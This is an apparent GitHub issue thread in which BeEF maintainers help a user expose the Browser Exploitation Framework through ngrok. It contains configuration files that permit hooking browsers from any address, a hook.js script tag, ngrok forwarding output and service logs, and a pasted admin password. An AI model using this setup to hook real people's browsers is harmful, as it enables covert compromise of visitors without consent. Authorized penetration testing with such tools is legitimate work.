Closed azamet90 closed 4 years ago
@azamet90 If you want assistance, you'll have to put in some effort.
We tried to help you ages ago but you stopped responding.
Please show your configuration and any logs and error messages.
Please describe what steps you have taken to resolve the issue.
Please carefully read the FAQ again.
@azamet90 If you want assistance, you'll have to put in some effort.
We tried to help you ages ago but you stopped responding.
Please show your configuration and any logs and error messages.
Please describe what steps you have taken to resolve the issue.
Please carefully read the FAQ again.
* https://github.com/beefproject/beef/wiki/FAQ#how-do-i-configure-beef-with-ngrok
i did it pls check my images i post you thx for replying so fast but still not working
same
See your configuration here:
Where you have host
, that field is the BeEF host, not the ngrok host.
You need to change public
, not host
, as described on the wiki.
Also, do not include the URL scheme http://
.
Also, when testing, do not use HTTPS. That will make testing more difficult and harder to diagnose the issue.
If you start with a clean configuration file, literally all you have to do is change these two fields:
public: "<your-id>.ngrok.io" # public hostname/IP address
public_port: "80" # public port (experimental)
If are changing more than these two fields, you are doing something wrong.
If you start with a clean configuration file, all you have to do is change these two fields:
public: "<your-id>.ngrok.io" # public hostname/IP address public_port: "80" # public port (experimental)
beef:
version: 0.5.0.0
debug: false
client_debug: false
crypto_default_value_length: 80
credentials:
user: beef
passwd: Deneme123..1..1
restrictions:
permitted_hooking_subnet:
- 0.0.0.0/0
- "::/0"
permitted_ui_subnet:
- 0.0.0.0/0
- "::/0"
api_attempt_delay: '0.05'
http:
debug: false
host: 0.0.0.0
port: '3000'
xhr_poll_timeout: 1000
hook_file: "/hook.js"
hook_session_name: BEEFHOOK
restful_api:
allow_cors: false
cors_allowed_domains: http://browserhacker.com
websocket:
enable: false
port: 61985
secure: true
secure_port: 61986
ws_poll_timeout: 1000
ws_connect_timeout: 500
web_server_imitation:
enable: true
type: apache
hook_404: false
hook_root: false
https:
enable: false
key: beef_key.pem
cert: beef_cert.pem
database:
file: db/beef.db
autorun:
result_poll_interval: 300
result_poll_timeout: 5000
continue_after_timeout: true
dns_hostname_lookup: false
geoip:
enable: true
database: "/var/lib/GeoIP/GeoLite2-City.mmdb"
integration:
phishing_frenzy:
enable: false
extension:
admin_ui:
enable: true
base_path: "/ui"
demos:
enable: true
events:
enable: true
evasion:
enable: false
requester:
enable: true
proxy:
enable: true
network:
enable: true
metasploit:
enable: false
social_engineering:
enable: true
xssrays:
enable: true
i cannot see that option in default config.yaml file? it is preinstalled on kali distro. does it means i need to add some extra line? if so where?
does it means i need to add some extra line? if so where?
Yes, you do not have the correct fields. See CHANGEME
below.
#
# Copyright (c) 2006-2020 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
# BeEF Configuration file
beef:
version: '0.5.0.0-alpha-pre'
# More verbose messages (server-side)
debug: false
# More verbose messages (client-side)
client_debug: false
# Used for generating secure tokens
crypto_default_value_length: 80
# Credentials to authenticate in BeEF.
# Used by both the RESTful API and the Admin interface
credentials:
user: "beef"
passwd: "123"
# Interface / IP restrictions
restrictions:
# subnet of IP addresses that can hook to the framework
permitted_hooking_subnet: ["0.0.0.0/0", "::/0"]
# subnet of IP addresses that can connect to the admin UI
#permitted_ui_subnet: ["127.0.0.1/32", "::1/128"]
permitted_ui_subnet: ["0.0.0.0/0", "::/0"]
# slow API calls to 1 every api_attempt_delay seconds
api_attempt_delay: "0.05"
# HTTP server
http:
debug: false #Thin::Logging.debug, very verbose. Prints also full exception stack trace.
host: "0.0.0.0"
port: "3000"
# Decrease this setting to 1,000 (ms) if you want more responsiveness
# when sending modules and retrieving results.
# NOTE: A poll timeout of less than 5,000 (ms) might impact performance
# when hooking lots of browsers (50+).
# Enabling WebSockets is generally better (beef.websocket.enable)
xhr_poll_timeout: 1000
# Host Name / Domain Name
# If you want BeEF to be accessible via hostname or domain name (ie, DynDNS),
# set the public hostname below:
#public: "" # public hostname/IP address
# Reverse Proxy / NAT
# If you want BeEF to be accessible behind a reverse proxy or NAT,
# set both the publicly accessible hostname/IP address and port below:
# NOTE: Allowing the reverse proxy will enable a vulnerability where the ui/panel can be spoofed
# by altering the X-FORWARDED-FOR ip address in the request header.
allow_reverse_proxy: false
#public: "" # public hostname/IP address <--- CHANGEME
#public_port: "" # public port (experimental) <--- CHANGEME
# Hook
hook_file: "/hook.js"
hook_session_name: "BEEFHOOK"
# Allow one or multiple origins to access the RESTful API using CORS
# For multiple origins use: "http://browserhacker.com, http://domain2.com"
restful_api:
allow_cors: false
cors_allowed_domains: "http://browserhacker.com"
# Prefer WebSockets over XHR-polling when possible.
websocket:
enable: false
port: 61985 # WS: good success rate through proxies
# Use encrypted 'WebSocketSecure'
# NOTE: works only on HTTPS domains and with HTTPS support enabled in BeEF
secure: true
secure_port: 61986 # WSSecure
ws_poll_timeout: 5000 # poll BeEF every x second, this affects how often the browser can have a command execute on it
ws_connect_timeout: 500 # useful to help fingerprinting finish before establishing the WS channel
# Imitate a specified web server (default root page, 404 default error page, 'Server' HTTP response header)
web_server_imitation:
enable: true
type: "apache" # Supported: apache, iis, nginx
hook_404: false # inject BeEF hook in HTTP 404 responses
hook_root: false # inject BeEF hook in the server home page
# Experimental HTTPS support for the hook / admin / all other Thin managed web services
https:
enable: false
# In production environments, be sure to use a valid certificate signed for the value
# used in beef.http.public (the domain name of the server where you run BeEF)
key: "beef_key.pem"
cert: "beef_cert.pem"
database:
file: "beef.db"
# Autorun Rule Engine
autorun:
# this is used when rule chain_mode type is nested-forward, needed as command results are checked via setInterval
# to ensure that we can wait for async command results. The timeout is needed to prevent infinite loops or eventually
# continue execution regardless of results.
# If you're chaining multiple async modules, and you expect them to complete in more than 5 seconds, increase the timeout.
result_poll_interval: 300
result_poll_timeout: 5000
# If the modules doesn't return status/results and timeout exceeded, continue anyway with the chain.
# This is useful to call modules (nested-forward chain mode) that are not returning their status/results.
continue_after_timeout: true
# Enables DNS lookups on zombie IP addresses
dns_hostname_lookup: false
# IP Geolocation
# NOTE: requires MaxMind database. Run ./updated-geoipdb to install.
geoip:
enable: true
database: '/opt/GeoIP/GeoLite2-City.mmdb'
# Integration with PhishingFrenzy
# If enabled BeEF will try to get the UID parameter value from the hooked URI, as this is used by PhishingFrenzy
# to uniquely identify the victims. In this way you can easily associate phishing emails with hooked browser.
integration:
phishing_frenzy:
enable: false
# You may override default extension configuration parameters here
# Note: additional experimental extensions are available in the 'extensions' directory
# and can be enabled via their respective 'config.yaml' file
extension:
admin_ui:
enable: true
base_path: "/ui"
demos:
enable: true
events:
enable: true
evasion:
enable: false
requester:
enable: true
proxy:
enable: true
network:
enable: true
metasploit:
enable: false
social_engineering:
enable: true
xssrays:
enable: true
public:
it is very different on me as u can see sir... can i just copy this and put in to my config.yaml file? will it work also without errors if i do it?
it is very different on me as u can see sir... can i just copy this and put in to my config.yaml file? will it work also without errors if i do it?
There's one way to find out.
Actually, no, don't copy my entire configuration file.
Just put these two lines under beef
-> http
:
beef:
# ... snip ...
http:
# ... snip ...
public: "<your-id>.ngrok.io" # public hostname/IP address
public_port: "80" # public port (experimental)
Also, when you pasted your configuration file above, you also pasted your password. You might want to change it.
Also, when you pasted your configuration file above, you also pasted your password. You might want to change it. :-/ what am i doing still wrong sir?
:-/ what am i doing still wrong sir?
Try testing with HTTP not HTTPS
Also, try testing with the demo page.
Remember, you are trying to debug your configuration. Debugging is extremely difficult when you change more than one thing at a time.
:-/ what am i doing still wrong sir?
Try testing with HTTP not HTTPS
Also, try testing with the demo page.
Remember, you are trying to debug your configuration. Debugging is extremely difficult when you change more than one thing at a time.
result is same i cannot see my browser there :-/
result is same i cannot see my browser there :-/
It seems like you've got ngrok working. Congratulations!
The issue you face is another one.
If you want assistance, you'll have to put in some effort.
Please show your configuration and any logs and error messages.
Please describe what steps you have taken to resolve the issue.
first i started ngrok with ngrok --start all
Session Status online
Account xxxxx (Plan: Free)
Version 2.3.35
Region United States (us)
Web Interface http://127.0.0.1:4040
Forwarding http://xxxxxx.ngrok.io -> http://localhost:80
Forwarding https://xxxxxx.ngrok.io -> http://localhost:80
Forwarding http://xxxxxxxx.ngrok.io -> http://localhost:3000
Forwarding https://xxxxxx.ngrok.io -> http://localhost:3000
Connections ttl opn rt1 rt5 p50 p90
0 0 0.00 0.00 0.00 0.00
after i did put the link which is given for port 80 to beef config.yaml
public: "xxxxxx.ngrok.io" # public hostname/IP address
public_port: "80" # public port (experimental)
after i started beef-xss
sudo beef-xss
[i] GeoIP database is missing
[i] Run geoipupdate to download / update Maxmind GeoIP database
[*] Please wait for the BeEF service to start.
[*]
[*] You might need to refresh your browser once it opens.
[*]
[*] Web UI: http://127.0.0.1:3000/ui/panel
[*] Hook: <script src="http://<IP>:3000/hook.js"></script>
[*] Example: <script src="http://127.0.0.1:3000/hook.js"></script>
● beef-xss.service - beef-xss
Loaded: loaded (/lib/systemd/system/beef-xss.service; disabled; vendor preset: disabled)
Active: active (running) since Sun 2020-06-14 16:57:01 +03; 5s ago
Main PID: 22296 (ruby)
Tasks: 4 (limit: 18967)
Memory: 73.4M
CGroup: /system.slice/beef-xss.service
└─22296 ruby /usr/share/beef-xss/beef
Haz 14 16:57:01 MrRobots systemd[1]: Started beef-xss.
Haz 14 16:57:02 MrRobots beef[22296]: [16:57:02][*] Browser Exploitation Framework (BeEF)….5.0.0
Haz 14 16:57:02 MrRobots beef[22296]: [16:57:02] | Twit: @beefproject
Haz 14 16:57:02 MrRobots beef[22296]: [16:57:02] | Site: https://beefproject.com
Haz 14 16:57:02 MrRobots beef[22296]: [16:57:02] | Blog: http://blog.beefproject.com
Haz 14 16:57:02 MrRobots beef[22296]: [16:57:02] |_ Wiki: https://github.com/beefproj…f/wiki
Haz 14 16:57:02 MrRobots beef[22296]: [16:57:02][*] Project Creator: Wade Alcorn (@WadeAlcorn)
Haz 14 16:57:02 MrRobots beef[22296]: -- migration_context()
Haz 14 16:57:02 MrRobots beef[22296]: -> 0.0033s
Haz 14 16:57:02 MrRobots beef[22296]: [16:57:02][*] BeEF is loading. Wait a few seconds...
Hint: Some lines were ellipsized, use -l to show in full.
[*] Opening Web UI (http://127.0.0.1:3000/ui/panel) in: 5... 4... 3... 2... 1..
after i put the js code after head like this one:
this is the ngrok link which is for port 3000
after i logged in to browser with the 3000 port ngrok link and after i open the page with beef script but there is no sesson ... where is the logs?
The Web Starter Kit is not the demo page. Is it hosted on HTTPS?
Use the HTTP demo page: http://your.ngrok.address/demos/basic.html
but there is no sesson ... where is the logs?
There are browser logs in the browser console. On Firefox, press CTRL+SHIFT+K and look at the console for error messages. You may also want to look at the Network tab to view the network traffic.
The server logs are usually stored in ~/.beef/
. The logs are also displayed in the terminal when BeEF is stared; however, BeEF runs as the beef-xss
service on Kali, you may need to look in journalctl
.
after this log i fixed my problem thank you so much
the wiki page is not enough to understand if i put the link and change the port the beef is giving error -1 i tryed every type of link and port to add to the config.yaml but no luck can anyone pls put here the steps so that we can understand it?
if i not change the port: